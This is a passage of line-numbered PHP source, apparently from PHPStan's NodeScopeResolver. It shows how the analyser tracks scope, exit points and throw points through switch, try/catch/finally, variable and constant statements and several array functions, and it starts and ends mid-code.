$scopeForBranches, $nodeCallback, ExpressionContext::createDeep()); 1138: $scopeForBranches = $caseResult->getScope(); 1139: $hasYield = $hasYield || $caseResult->hasYield(); 1140: $throwPoints = array_merge($throwPoints, $caseResult->getThrowPoints()); 1141: $branchScope = $scopeForBranches->filterByTruthyValue($condExpr); 1142: } else { 1143: $hasDefaultCase = true; 1144: $branchScope = $scopeForBranches; 1145: } 1146: 1147: $branchScope = $branchScope->mergeWith($prevScope); 1148: $branchScopeResult = $this->processStmtNodes($caseNode, $caseNode->stmts, $branchScope, $nodeCallback); 1149: $branchScope = $branchScopeResult->getScope(); 1150: $branchFinalScopeResult = $branchScopeResult->filterOutLoopExitPoints(); 1151: $hasYield = $hasYield || $branchFinalScopeResult->hasYield(); 1152: foreach ($branchScopeResult->getExitPointsByType(Break_::class) as $breakExitPoint) { 1153: $alwaysTerminating = false; 1154: $finalScope = $breakExitPoint->getScope()->mergeWith($finalScope); 1155: } 1156: foreach ($branchScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 1157: $finalScope = $continueExitPoint->getScope()->mergeWith($finalScope); 1158: } 1159: $exitPointsForOuterLoop = array_merge($exitPointsForOuterLoop, $branchFinalScopeResult->getExitPointsForOuterLoop()); 1160: $throwPoints = array_merge($throwPoints, $branchFinalScopeResult->getThrowPoints()); 1161: if ($branchScopeResult->isAlwaysTerminating()) { 1162: $alwaysTerminating = $alwaysTerminating && $branchFinalScopeResult->isAlwaysTerminating(); 1163: $prevScope = null; 1164: if (isset($condExpr)) { 1165: $scopeForBranches = $scopeForBranches->filterByFalseyValue($condExpr); 1166: } 1167: if (!$branchFinalScopeResult->isAlwaysTerminating()) { 1168: $finalScope = $branchScope->mergeWith($finalScope); 1169: } 1170: } else { 1171: $prevScope = $branchScope; 1172: } 1173: } 1174: 1175: $exhaustive = $scopeForBranches->getType($stmt->cond) instanceof NeverType; 1176: 1177: if (!$hasDefaultCase && !$exhaustive) { 1178: $alwaysTerminating = false; 1179: } 1180: 1181: if ($prevScope !== null && isset($branchFinalScopeResult)) { 1182: $finalScope = $prevScope->mergeWith($finalScope); 1183: $alwaysTerminating = $alwaysTerminating && $branchFinalScopeResult->isAlwaysTerminating(); 1184: } 1185: 1186: if ((!$hasDefaultCase && !$exhaustive) || $finalScope === null) { 1187: $finalScope = $scope->mergeWith($finalScope); 1188: } 1189: 1190: return new StatementResult($finalScope, $hasYield, $alwaysTerminating, $exitPointsForOuterLoop, $throwPoints); 1191: } elseif ($stmt instanceof TryCatch) { 1192: $branchScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $scope, $nodeCallback); 1193: $branchScope = $branchScopeResult->getScope(); 1194: $finalScope = $branchScopeResult->isAlwaysTerminating() ? null : $branchScope; 1195: 1196: $exitPoints = []; 1197: $finallyExitPoints = []; 1198: $alwaysTerminating = $branchScopeResult->isAlwaysTerminating(); 1199: $hasYield = $branchScopeResult->hasYield(); 1200: 1201: if ($stmt->finally !== null) { 1202: $finallyScope = $branchScope; 1203: } else { 1204: $finallyScope = null; 1205: } 1206: foreach ($branchScopeResult->getExitPoints() as $exitPoint) { 1207: $finallyExitPoints[] = $exitPoint; 1208: if ($exitPoint->getStatement() instanceof Throw_) { 1209: continue; 1210: } 1211: if ($finallyScope !== null) { 1212: $finallyScope = $finallyScope->mergeWith($exitPoint->getScope()); 1213: } 1214: $exitPoints[] = $exitPoint; 1215: } 1216: 1217: $throwPoints = $branchScopeResult->getThrowPoints(); 1218: $throwPointsForLater = []; 1219: $pastCatchTypes = new NeverType(); 1220: 1221: foreach ($stmt->catches as $catchNode) { 1222: $nodeCallback($catchNode, $scope); 1223: 1224: $catchType = TypeCombinator::union(...array_map(static fn (Name $name): Type => new ObjectType($name->toString()), $catchNode->types)); 1225: $originalCatchType = $catchType; 1226: $isThrowable = $originalCatchType instanceof TypeWithClassName && strtolower($originalCatchType->getClassName()) === 'throwable'; 1227: $catchType = TypeCombinator::remove($catchType, $pastCatchTypes); 1228: $pastCatchTypes = TypeCombinator::union($pastCatchTypes, $originalCatchType); 1229: $matchingThrowPoints = []; 1230: $newThrowPoints = []; 1231: foreach ($throwPoints as $throwPoint) { 1232: if (!$throwPoint->isExplicit() && !$catchType->isSuperTypeOf(new ObjectType(Throwable::class))->yes()) { 1233: continue; 1234: } 1235: $isSuperType = $catchType->isSuperTypeOf($throwPoint->getType()); 1236: if ($isSuperType->no()) { 1237: continue; 1238: } 1239: $matchingThrowPoints[] = $throwPoint; 1240: } 1241: $hasExplicit = count($matchingThrowPoints) > 0; 1242: foreach ($throwPoints as $throwPoint) { 1243: $isSuperType = $catchType->isSuperTypeOf($throwPoint->getType()); 1244: if (!$hasExplicit && !$isSuperType->no()) { 1245: $matchingThrowPoints[] = $throwPoint; 1246: } 1247: if ($isSuperType->yes()) { 1248: continue; 1249: } 1250: if ($isThrowable) { 1251: continue; 1252: } 1253: $newThrowPoints[] = $throwPoint->subtractCatchType($catchType); 1254: } 1255: $throwPoints = $newThrowPoints; 1256: 1257: if (count($matchingThrowPoints) === 0) { 1258: $throwableThrowPoints = []; 1259: if ($originalCatchType->isSuperTypeOf(new ObjectType(Throwable::class))->yes()) { 1260: foreach ($branchScopeResult->getThrowPoints() as $originalThrowPoint) { 1261: if (!$originalThrowPoint->canContainAnyThrowable()) { 1262: continue; 1263: } 1264: 1265: $throwableThrowPoints[] = $originalThrowPoint; 1266: } 1267: } 1268: 1269: if (count($throwableThrowPoints) === 0) { 1270: $nodeCallback(new CatchWithUnthrownExceptionNode($catchNode, $catchType, $originalCatchType), $scope); 1271: continue; 1272: } 1273: 1274: $matchingThrowPoints = $throwableThrowPoints; 1275: } 1276: 1277: $catchScope = null; 1278: foreach ($matchingThrowPoints as $matchingThrowPoint) { 1279: if ($catchScope === null) { 1280: $catchScope = $matchingThrowPoint->getScope(); 1281: } else { 1282: $catchScope = $catchScope->mergeWith($matchingThrowPoint->getScope()); 1283: } 1284: } 1285: 1286: $variableName = null; 1287: if ($catchNode->var !== null) { 1288: if (!is_string($catchNode->var->name)) { 1289: throw new ShouldNotHappenException(); 1290: } 1291: 1292: $variableName = $catchNode->var->name; 1293: } 1294: 1295: $catchScopeResult = $this->processStmtNodes($catchNode, $catchNode->stmts, $catchScope->enterCatchType($catchType, $variableName), $nodeCallback); 1296: $catchScopeForFinally = $catchScopeResult->getScope(); 1297: 1298: $finalScope = $catchScopeResult->isAlwaysTerminating() ? $finalScope : $catchScopeResult->getScope()->mergeWith($finalScope); 1299: $alwaysTerminating = $alwaysTerminating && $catchScopeResult->isAlwaysTerminating(); 1300: $hasYield = $hasYield || $catchScopeResult->hasYield(); 1301: $catchThrowPoints = $catchScopeResult->getThrowPoints(); 1302: $throwPointsForLater = array_merge($throwPointsForLater, $catchThrowPoints); 1303: 1304: if ($finallyScope !== null) { 1305: $finallyScope = $finallyScope->mergeWith($catchScopeForFinally); 1306: } 1307: foreach ($catchScopeResult->getExitPoints() as $exitPoint) { 1308: $finallyExitPoints[] = $exitPoint; 1309: if ($exitPoint->getStatement() instanceof Throw_) { 1310: continue; 1311: } 1312: if ($finallyScope !== null) { 1313: $finallyScope = $finallyScope->mergeWith($exitPoint->getScope()); 1314: } 1315: $exitPoints[] = $exitPoint; 1316: } 1317: 1318: foreach ($catchThrowPoints as $catchThrowPoint) { 1319: if ($finallyScope === null) { 1320: continue; 1321: } 1322: $finallyScope = $finallyScope->mergeWith($catchThrowPoint->getScope()); 1323: } 1324: } 1325: 1326: if ($finalScope === null) { 1327: $finalScope = $scope; 1328: } 1329: 1330: foreach ($throwPoints as $throwPoint) { 1331: if ($finallyScope === null) { 1332: continue; 1333: } 1334: $finallyScope = $finallyScope->mergeWith($throwPoint->getScope()); 1335: } 1336: 1337: if ($finallyScope !== null && $stmt->finally !== null) { 1338: $originalFinallyScope = $finallyScope; 1339: $finallyResult = $this->processStmtNodes($stmt->finally, $stmt->finally->stmts, $finallyScope, $nodeCallback); 1340: $alwaysTerminating = $alwaysTerminating || $finallyResult->isAlwaysTerminating(); 1341: $hasYield = $hasYield || $finallyResult->hasYield(); 1342: $throwPointsForLater = array_merge($throwPointsForLater, $finallyResult->getThrowPoints()); 1343: $finallyScope = $finallyResult->getScope(); 1344: $finalScope = $finallyResult->isAlwaysTerminating() ? $finalScope : $finalScope->processFinallyScope($finallyScope, $originalFinallyScope); 1345: if (count($finallyResult->getExitPoints()) > 0) { 1346: $nodeCallback(new FinallyExitPointsNode( 1347: $finallyResult->getExitPoints(), 1348: $finallyExitPoints, 1349: ), $scope); 1350: } 1351: $exitPoints = array_merge($exitPoints, $finallyResult->getExitPoints()); 1352: } 1353: 1354: return new StatementResult($finalScope, $hasYield, $alwaysTerminating, $exitPoints, array_merge($throwPoints, $throwPointsForLater)); 1355: } elseif ($stmt instanceof Unset_) { 1356: $hasYield = false; 1357: $throwPoints = []; 1358: foreach ($stmt->vars as $var) { 1359: $scope = $this->lookForSetAllowedUndefinedExpressions($scope, $var); 1360: $scope = $this->processExprNode($var, $scope, $nodeCallback, ExpressionContext::createDeep())->getScope(); 1361: $scope = $this->lookForUnsetAllowedUndefinedExpressions($scope, $var); 1362: $scope = $scope->unsetExpression($var); 1363: } 1364: } elseif ($stmt instanceof Node\Stmt\Use_) { 1365: $hasYield = false; 1366: $throwPoints = []; 1367: foreach ($stmt->uses as $use) { 1368: $this->processStmtNode($use, $scope, $nodeCallback); 1369: } 1370: } elseif ($stmt instanceof Node\Stmt\Global_) { 1371: $hasYield = false; 1372: $throwPoints = []; 1373: $vars = []; 1374: foreach ($stmt->vars as $var) { 1375: if (!$var instanceof Variable) { 1376: throw new ShouldNotHappenException(); 1377: } 1378: $scope = $this->lookForSetAllowedUndefinedExpressions($scope, $var); 1379: $this->processExprNode($var, $scope, $nodeCallback, ExpressionContext::createDeep()); 1380: $scope = $this->lookForUnsetAllowedUndefinedExpressions($scope, $var); 1381: 1382: if (!is_string($var->name)) { 1383: continue; 1384: } 1385: 1386: $scope = $scope->assignVariable($var->name, new MixedType()); 1387: $vars[] = $var->name; 1388: } 1389: $scope = $this->processVarAnnotation($scope, $vars, $stmt); 1390: } elseif ($stmt instanceof Static_) { 1391: $hasYield = false; 1392: $throwPoints = []; 1393: 1394: $vars = []; 1395: foreach ($stmt->vars as $var) { 1396: $scope = $this->processStmtNode($var, $scope, $nodeCallback)->getScope(); 1397: if (!is_string($var->var->name)) { 1398: continue; 1399: } 1400: 1401: $vars[] = $var->var->name; 1402: } 1403: 1404: $scope = $this->processVarAnnotation($scope, $vars, $stmt); 1405: } elseif ($stmt instanceof StaticVar) { 1406: $hasYield = false; 1407: $throwPoints = []; 1408: if (!is_string($stmt->var->name)) { 1409: throw new ShouldNotHappenException(); 1410: } 1411: if ($stmt->default !== null) { 1412: $this->processExprNode($stmt->default, $scope, $nodeCallback, ExpressionContext::createDeep()); 1413: } 1414: $scope = $scope->enterExpressionAssign($stmt->var); 1415: $this->processExprNode($stmt->var, $scope, $nodeCallback, ExpressionContext::createDeep()); 1416: $scope = $scope->exitExpressionAssign($stmt->var); 1417: $scope = $scope->assignVariable($stmt->var->name, new MixedType()); 1418: } elseif ($stmt instanceof Node\Stmt\Const_ || $stmt instanceof Node\Stmt\ClassConst) { 1419: $hasYield = false; 1420: $throwPoints = []; 1421: if ($stmt instanceof Node\Stmt\ClassConst) { 1422: $this->processAttributeGroups($stmt->attrGroups, $scope, $nodeCallback); 1423: } 1424: foreach ($stmt->consts as $const) { 1425: $nodeCallback($const, $scope); 1426: $this->processExprNode($const->value, $scope, $nodeCallback, ExpressionContext::createDeep()); 1427: if ($scope->getNamespace() !== null) { 1428: $constName = [$scope->getNamespace(), $const->name->toString()]; 1429: } else { 1430: $constName = $const->name->toString(); 1431: } 1432: $scope = $scope->assignExpression(new ConstFetch(new Name\FullyQualified($constName)), $scope->getType($const->value)); 1433: } 1434: } elseif ($stmt instanceof Node\Stmt\Nop) { 1435: $scope = $this->processStmtVarAnnotation($scope, $stmt, null); 1436: $hasYield = false; 1437: $throwPoints = $overridingThrowPoints ?? []; 1438: } else { 1439: $hasYield = false; 1440: $throwPoints = $overridingThrowPoints ?? []; 1441: } 1442: 1443: return new StatementResult($scope, $hasYield, false, [], $throwPoints); 1444: } 1445: 1446: /** 1447: * @return ThrowPoint[]|null 1448: */ 1449: private function getOverridingThrowPoints(Node\Stmt $statement, MutatingScope $scope): ?array 1450: { 1451: foreach ($statement->getComments() as $comment) { 1452: if (!$comment instanceof Doc) { 1453: continue; 1454: } 1455: 1456: $function = $scope->getFunction(); 1457: $resolvedPhpDoc = $this->fileTypeMapper->getResolvedPhpDoc( 1458: $scope->getFile(), 1459: $scope->isInClass() ? $scope->getClassReflection()->getName() : null, 1460: $scope->isInTrait() ? $scope->getTraitReflection()->getName() : null, 1461: $function !== null ? $function->getName() : null, 1462: $comment->getText(), 1463: ); 1464: 1465: $throwsTag = $resolvedPhpDoc->getThrowsTag(); 1466: if ($throwsTag !== null) { 1467: $throwsType = $throwsTag->getType(); 1468: if ($throwsType instanceof VoidType) { 1469: return []; 1470: } 1471: 1472: return [ThrowPoint::createExplicit($scope, $throwsType, $statement, false)]; 1473: } 1474: } 1475: 1476: return null; 1477: } 1478: 1479: private function getCurrentClassReflection(Node\Stmt\ClassLike $stmt, string $className, Scope $scope): ClassReflection 1480: { 1481: if (!$this->reflectionProvider->hasClass($className)) { 1482: return $this->createAstClassReflection($stmt, $className, $scope); 1483: } 1484: 1485: $defaultClassReflection = $this->reflectionProvider->getClass($className); 1486: if ($defaultClassReflection->getFileName() !== $scope->getFile()) { 1487: return $this->createAstClassReflection($stmt, $className, $scope); 1488: } 1489: 1490: $startLine = $defaultClassReflection->getNativeReflection()->getStartLine(); 1491: if ($startLine !== $stmt->getStartLine()) { 1492: return $this->createAstClassReflection($stmt, $className, $scope); 1493: } 1494: 1495: return $defaultClassReflection; 1496: } 1497: 1498: private function createAstClassReflection(Node\Stmt\ClassLike $stmt, string $className, Scope $scope): ClassReflection 1499: { 1500: $nodeToReflection = new NodeToReflection(); 1501: $betterReflectionClass = $nodeToReflection->__invoke( 1502: $this->reflector, 1503: $stmt, 1504: new LocatedSource(FileReader::read($scope->getFile()), $className, $scope->getFile()), 1505: $scope->getNamespace() !== null ? new Node\Stmt\Namespace_(new Name($scope->getNamespace())) : null, 1506: ); 1507: if (!$betterReflectionClass instanceof \PHPStan\BetterReflection\Reflection\ReflectionClass) { 1508: throw new ShouldNotHappenException(); 1509: } 1510: 1511: $enumAdapter = base64_decode('UEhQU3RhblxCZXR0ZXJSZWZsZWN0aW9uXFJlZmxlY3Rpb25cQWRhcHRlclxSZWZsZWN0aW9uRW51bQ==', true); 1512: 1513: return new ClassReflection( 1514: $this->reflectionProvider, 1515: $this->initializerExprTypeResolver, 1516: $this->fileTypeMapper, 1517: $this->stubPhpDocProvider, 1518: $this->phpDocInheritanceResolver, 1519: $this->phpVersion, 1520: $this->classReflectionExtensionRegistryProvider->getRegistry()->getPropertiesClassReflectionExtensions(), 1521: $this->classReflectionExtensionRegistryProvider->getRegistry()->getMethodsClassReflectionExtensions(), 1522: $betterReflectionClass->getName(), 1523: $betterReflectionClass instanceof ReflectionEnum && PHP_VERSION_ID >= 80000 ? new $enumAdapter($betterReflectionClass) : new ReflectionClass($betterReflectionClass), 1524: null, 1525: null, 1526: null, 1527: sprintf('%s:%d', $scope->getFile(), $stmt->getStartLine()), 1528: ); 1529: } 1530: 1531: private function lookForSetAllowedUndefinedExpressions(MutatingScope $scope, Expr $expr): MutatingScope 1532: { 1533: return $this->lookForExpressionCallback($scope, $expr, static fn (MutatingScope $scope, Expr $expr): MutatingScope => $scope->setAllowedUndefinedExpression($expr)); 1534: } 1535: 1536: private function lookForUnsetAllowedUndefinedExpressions(MutatingScope $scope, Expr $expr): MutatingScope 1537: { 1538: return $this->lookForExpressionCallback($scope, $expr, static fn (MutatingScope $scope, Expr $expr): MutatingScope => $scope->unsetAllowedUndefinedExpression($expr)); 1539: } 1540: 1541: /** 1542: * @param Closure(MutatingScope $scope, Expr $expr): MutatingScope $callback 1543: */ 1544: private function lookForExpressionCallback(MutatingScope $scope, Expr $expr, Closure $callback): MutatingScope 1545: { 1546: if (!$expr instanceof ArrayDimFetch || $expr->dim !== null) { 1547: $scope = $callback($scope, $expr); 1548: } 1549: 1550: if ($expr instanceof ArrayDimFetch) { 1551: $scope = $this->lookForExpressionCallback($scope, $expr->var, $callback); 1552: } elseif ($expr instanceof PropertyFetch || $expr instanceof Expr\NullsafePropertyFetch) { 1553: $scope = $this->lookForExpressionCallback($scope, $expr->var, $callback); 1554: } elseif ($expr instanceof StaticPropertyFetch && $expr->class instanceof Expr) { 1555: $scope = $this->lookForExpressionCallback($scope, $expr->class, $callback); 1556: } elseif ($expr instanceof Array_ || $expr instanceof List_) { 1557: foreach ($expr->items as $item) { 1558: if ($item === null) { 1559: continue; 1560: } 1561: 1562: $scope = $this->lookForExpressionCallback($scope, $item->value, $callback); 1563: } 1564: } 1565: 1566: return $scope; 1567: } 1568: 1569: private function ensureShallowNonNullability(MutatingScope $scope, Scope $originalScope, Expr $exprToSpecify): EnsuredNonNullabilityResult 1570: { 1571: $exprType = $scope->getType($exprToSpecify); 1572: $exprTypeWithoutNull = TypeCombinator::removeNull($exprType); 1573: if ($exprType->equals($exprTypeWithoutNull)) { 1574: $originalExprType = $originalScope->getType($exprToSpecify); 1575: $originalNativeType = $originalScope->getNativeType($exprToSpecify); 1576: if (!$originalExprType->equals($exprTypeWithoutNull)) { 1577: return new EnsuredNonNullabilityResult($scope, [ 1578: new EnsuredNonNullabilityResultExpression($exprToSpecify, $originalExprType, $originalNativeType), 1579: ]); 1580: } 1581: return new EnsuredNonNullabilityResult($scope, []); 1582: } 1583: 1584: $nativeType = $scope->getNativeType($exprToSpecify); 1585: $scope = $scope->assignExpression( 1586: $exprToSpecify, 1587: $exprTypeWithoutNull, 1588: TypeCombinator::removeNull($nativeType), 1589: ); 1590: 1591: return new EnsuredNonNullabilityResult( 1592: $scope, 1593: [ 1594: new EnsuredNonNullabilityResultExpression($exprToSpecify, $exprType, $nativeType), 1595: ], 1596: ); 1597: } 1598: 1599: private function ensureNonNullability(MutatingScope $scope, Expr $expr): EnsuredNonNullabilityResult 1600: { 1601: $specifiedExpressions = []; 1602: $originalScope = $scope; 1603: $scope = $this->lookForExpressionCallback($scope, $expr, function ($scope, $expr) use (&$specifiedExpressions, $originalScope) { 1604: $result = $this->ensureShallowNonNullability($scope, $originalScope, $expr); 1605: foreach ($result->getSpecifiedExpressions() as $specifiedExpression) { 1606: $specifiedExpressions[] = $specifiedExpression; 1607: } 1608: return $result->getScope(); 1609: }); 1610: 1611: return new EnsuredNonNullabilityResult($scope, $specifiedExpressions); 1612: } 1613: 1614: /** 1615: * @param EnsuredNonNullabilityResultExpression[] $specifiedExpressions 1616: */ 1617: private function revertNonNullability(MutatingScope $scope, array $specifiedExpressions): MutatingScope 1618: { 1619: foreach ($specifiedExpressions as $specifiedExpressionResult) { 1620: $scope = $scope->assignExpression( 1621: $specifiedExpressionResult->getExpression(), 1622: $specifiedExpressionResult->getOriginalType(), 1623: $specifiedExpressionResult->getOriginalNativeType(), 1624: ); 1625: } 1626: 1627: return $scope; 1628: } 1629: 1630: private function findEarlyTerminatingExpr(Expr $expr, Scope $scope): ?Expr 1631: { 1632: if (($expr instanceof MethodCall || $expr instanceof Expr\StaticCall) && $expr->name instanceof Node\Identifier) { 1633: if (array_key_exists($expr->name->toLowerString(), $this->earlyTerminatingMethodNames)) { 1634: if ($expr instanceof MethodCall) { 1635: $methodCalledOnType = $scope->getType($expr->var); 1636: } else { 1637: if ($expr->class instanceof Name) { 1638: $methodCalledOnType = $scope->resolveTypeByName($expr->class); 1639: } else { 1640: $methodCalledOnType = $scope->getType($expr->class); 1641: } 1642: } 1643: 1644: $directClassNames = TypeUtils::getDirectClassNames($methodCalledOnType); 1645: foreach ($directClassNames as $referencedClass) { 1646: if (!$this->reflectionProvider->hasClass($referencedClass)) { 1647: continue; 1648: } 1649: 1650: $classReflection = $this->reflectionProvider->getClass($referencedClass); 1651: foreach (array_merge([$referencedClass], $classReflection->getParentClassesNames(), $classReflection->getNativeReflection()->getInterfaceNames()) as $className) { 1652: if (!isset($this->earlyTerminatingMethodCalls[$className])) { 1653: continue; 1654: } 1655: 1656: if (in_array((string) $expr->name, $this->earlyTerminatingMethodCalls[$className], true)) { 1657: return $expr; 1658: } 1659: } 1660: } 1661: } 1662: } 1663: 1664: if ($expr instanceof FuncCall && $expr->name instanceof Name) { 1665: if (in_array((string) $expr->name, $this->earlyTerminatingFunctionCalls, true)) { 1666: return $expr; 1667: } 1668: } 1669: 1670: if ($expr instanceof Expr\Exit_ || $expr instanceof Expr\Throw_) { 1671: return $expr; 1672: } 1673: 1674: $exprType = $scope->getType($expr); 1675: if ($exprType instanceof NeverType && $exprType->isExplicit()) { 1676: return $expr; 1677: } 1678: 1679: return null; 1680: } 1681: 1682: /** 1683: * @param callable(Node $node, Scope $scope): void $nodeCallback 1684: */ 1685: private function processExprNode(Expr $expr, MutatingScope $scope, callable $nodeCallback, ExpressionContext $context): ExpressionResult 1686: { 1687: if ($expr instanceof Expr\CallLike && $expr->isFirstClassCallable()) { 1688: if ($expr instanceof FuncCall) { 1689: $newExpr = new FunctionCallableNode($expr->name, $expr); 1690: } elseif ($expr instanceof MethodCall) { 1691: $newExpr = new MethodCallableNode($expr->var, $expr->name, $expr); 1692: } elseif ($expr instanceof StaticCall) { 1693: $newExpr = new StaticMethodCallableNode($expr->class, $expr->name, $expr); 1694: } elseif ($expr instanceof New_ && !$expr->class instanceof Class_) { 1695: $newExpr = new InstantiationCallableNode($expr->class, $expr); 1696: } else { 1697: throw new ShouldNotHappenException(); 1698: } 1699: 1700: return $this->processExprNode($newExpr, $scope, $nodeCallback, $context); 1701: } 1702: 1703: $this->callNodeCallbackWithExpression($nodeCallback, $expr, $scope, $context); 1704: 1705: if ($expr instanceof Variable) { 1706: $hasYield = false; 1707: $throwPoints = []; 1708: if ($expr->name instanceof Expr) { 1709: return $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 1710: } 1711: } elseif ($expr instanceof Assign || $expr instanceof AssignRef) { 1712: $result = $this->processAssignVar( 1713: $scope, 1714: $expr->var, 1715: $expr->expr, 1716: $nodeCallback, 1717: $context, 1718: function (MutatingScope $scope) use ($expr, $nodeCallback, $context): ExpressionResult { 1719: if ($expr instanceof AssignRef) { 1720: $scope = $scope->enterExpressionAssign($expr->expr); 1721: } 1722: 1723: if ($expr->var instanceof Variable && is_string($expr->var->name)) { 1724: $context = $context->enterRightSideAssign( 1725: $expr->var->name, 1726: $scope->getType($expr->expr), 1727: ); 1728: } 1729: 1730: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()); 1731: $hasYield = $result->hasYield(); 1732: $throwPoints = $result->getThrowPoints(); 1733: $scope = $result->getScope(); 1734: 1735: if ($expr instanceof AssignRef) { 1736: $scope = $scope->exitExpressionAssign($expr->expr); 1737: } 1738: 1739: return new ExpressionResult($scope, $hasYield, $throwPoints); 1740: }, 1741: true, 1742: ); 1743: $scope = $result->getScope(); 1744: $hasYield = $result->hasYield(); 1745: $throwPoints = $result->getThrowPoints(); 1746: $vars = $this->getAssignedVariables($expr->var); 1747: if (count($vars) > 0) { 1748: $varChangedScope = false; 1749: $scope = $this->processVarAnnotation($scope, $vars, $expr, $varChangedScope); 1750: if (!$varChangedScope) { 1751: $scope = $this->processStmtVarAnnotation($scope, new Node\Stmt\Expression($expr, [ 1752: 'comments' => $expr->getAttribute('comments'), 1753: ]), null); 1754: } 1755: } 1756: } elseif ($expr instanceof Expr\AssignOp) { 1757: $result = $this->processAssignVar( 1758: $scope, 1759: $expr->var, 1760: $expr, 1761: $nodeCallback, 1762: $context, 1763: fn (MutatingScope $scope): ExpressionResult => $this->processExprNode($expr->expr, $scope, $nodeCallback, $context->enterDeep()), 1764: $expr instanceof Expr\AssignOp\Coalesce, 1765: ); 1766: $scope = $result->getScope(); 1767: $hasYield = $result->hasYield(); 1768: $throwPoints = $result->getThrowPoints(); 1769: if ( 1770: ($expr instanceof Expr\AssignOp\Div || $expr instanceof Expr\AssignOp\Mod) && 1771: !$scope->getType($expr->expr)->toNumber()->isSuperTypeOf(new ConstantIntegerType(0))->no() 1772: ) { 1773: $throwPoints[] = ThrowPoint::createExplicit($scope, new ObjectType(DivisionByZeroError::class), $expr, false); 1774: } 1775: } elseif ($expr instanceof FuncCall) { 1776: $parametersAcceptor = null; 1777: $functionReflection = null; 1778: $throwPoints = []; 1779: if ($expr->name instanceof Expr) { 1780: $nameType = $scope->getType($expr->name); 1781: if ($nameType->isCallable()->yes()) { 1782: $parametersAcceptor = ParametersAcceptorSelector::selectFromArgs( 1783: $scope, 1784: $expr->getArgs(), 1785: $nameType->getCallableParametersAcceptors($scope), 1786: ); 1787: } 1788: $nameResult = $this->processExprNode($expr->name, $scope, $nodeCallback, $context->enterDeep()); 1789: $throwPoints = $nameResult->getThrowPoints(); 1790: $scope = $nameResult->getScope(); 1791: } elseif ($this->reflectionProvider->hasFunction($expr->name, $scope)) { 1792: $functionReflection = $this->reflectionProvider->getFunction($expr->name, $scope); 1793: $parametersAcceptor = ParametersAcceptorSelector::selectFromArgs( 1794: $scope, 1795: $expr->getArgs(), 1796: $functionReflection->getVariants(), 1797: ); 1798: } 1799: $result = $this->processArgs($functionReflection, $parametersAcceptor, $expr->getArgs(), $scope, $nodeCallback, $context); 1800: $scope = $result->getScope(); 1801: $hasYield = $result->hasYield(); 1802: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 1803: 1804: if (isset($functionReflection)) { 1805: $functionThrowPoint = $this->getFunctionThrowPoint($functionReflection, $parametersAcceptor, $expr, $scope); 1806: if ($functionThrowPoint !== null) { 1807: $throwPoints[] = $functionThrowPoint; 1808: } 1809: } else { 1810: $throwPoints[] = ThrowPoint::createImplicit($scope, $expr); 1811: } 1812: 1813: if ( 1814: isset($functionReflection) 1815: && in_array($functionReflection->getName(), ['json_encode', 'json_decode'], true) 1816: ) { 1817: $scope = $scope->invalidateExpression(new FuncCall(new Name('json_last_error'), [])) 1818: ->invalidateExpression(new FuncCall(new Name\FullyQualified('json_last_error'), [])) 1819: ->invalidateExpression(new FuncCall(new Name('json_last_error_msg'), [])) 1820: ->invalidateExpression(new FuncCall(new Name\FullyQualified('json_last_error_msg'), [])); 1821: } 1822: 1823: if ( 1824: isset($functionReflection) 1825: && in_array($functionReflection->getName(), ['array_pop', 'array_shift'], true) 1826: && count($expr->getArgs()) >= 1 1827: ) { 1828: $arrayArg = $expr->getArgs()[0]->value; 1829: $arrayArgType = $scope->getType($arrayArg); 1830: $scope = $scope->invalidateExpression($arrayArg); 1831: 1832: $functionName = $functionReflection->getName(); 1833: $arrayArgType = TypeTraverser::map($arrayArgType, static function (Type $type, callable $traverse) use ($functionName): Type { 1834: if ($type instanceof UnionType || $type instanceof IntersectionType) { 1835: return $traverse($type); 1836: } 1837: if ($type instanceof ConstantArrayType) { 1838: return $functionName === 'array_pop' ? $type->removeLast() : $type->removeFirst(); 1839: } 1840: if ($type->isIterableAtLeastOnce()->yes()) { 1841: return $type->toArray(); 1842: } 1843: return $type; 1844: }); 1845: 1846: $scope = $scope->assignExpression( 1847: $arrayArg, 1848: $arrayArgType, 1849: $arrayArgType, 1850: ); 1851: } 1852: 1853: if ( 1854: isset($functionReflection) 1855: && in_array($functionReflection->getName(), ['array_push', 'array_unshift'], true) 1856: && count($expr->getArgs()) >= 2 1857: ) { 1858: $arrayArg = $expr->getArgs()[0]->value; 1859: $arrayType = $scope->getType($arrayArg); 1860: $callArgs = array_slice($expr->getArgs(), 1); 1861: 1862: /** 1863: * @param Arg[] $callArgs 1864: * @param callable(?Type, Type, bool): void $setOffsetValueType 1865: */ 1866: $setOffsetValueTypes = static function (Scope $scope, array $callArgs, callable $setOffsetValueType, ?bool &$nonConstantArrayWasUnpacked = null): void { 1867: foreach ($callArgs as $callArg) { 1868: $callArgType = $scope->getType($callArg->value); 1869: if ($callArg->unpack) { 1870: if ($callArgType instanceof ConstantArrayType) { 1871: $iterableValueTypes = $callArgType->getValueTypes(); 1872: } else { 1873: $iterableValueTypes = [$callArgType->getIterableValueType()]; 1874: $nonConstantArrayWasUnpacked = true; 1875: } 1876: 1877: $isOptional = !$callArgType->isIterableAtLeastOnce()->yes(); 1878: foreach ($iterableValueTypes as $iterableValueType) { 1879: if ($iterableValueType instanceof UnionType) { 1880: foreach ($iterableValueType->getTypes() as $innerType) { 1881: $setOffsetValueType(null, $innerType, $isOptional); 1882: } 1883: } else { 1884: $setOffsetValueType(null, $iterableValueType, $isOptional); 1885: } 1886: } 1887: continue; 1888: } 1889: $setOffsetValueType(null, $callArgType, false); 1890: } 1891: }; 1892: 1893: $constantArrays = TypeUtils::getOldConstantArrays($arrayType); 1894: if (count($constantArrays) > 0) { 1895: $newArrayTypes = []; 1896: $prepend = $functionReflection->getName() === 'array_unshift'; 1897: foreach ($constantArrays as $constantArray) { 1898: $arrayTypeBuilder = $prepend ? ConstantArrayTypeBuilder::createEmpty() : ConstantArrayTypeBuilder::createFromConstantArray($constantArray); 1899: 1900: $setOffsetValueTypes( 1901: $scope, 1902: $callArgs, 1903: static function (?Type $offsetType, Type $valueType, bool $optional) use (&$arrayTypeBuilder): void { 1904: $arrayTypeBuilder->setOffsetValueType($offsetType, $valueType, $optional); 1905: }, 1906: $nonConstantArrayWasUnpacked, 1907: ); 1908: 1909: if ($prepend) { 1910: $keyTypes = $constantArray->getKeyTypes(); 1911: $valueTypes = $constantArray->getValueTypes(); 1912: foreach 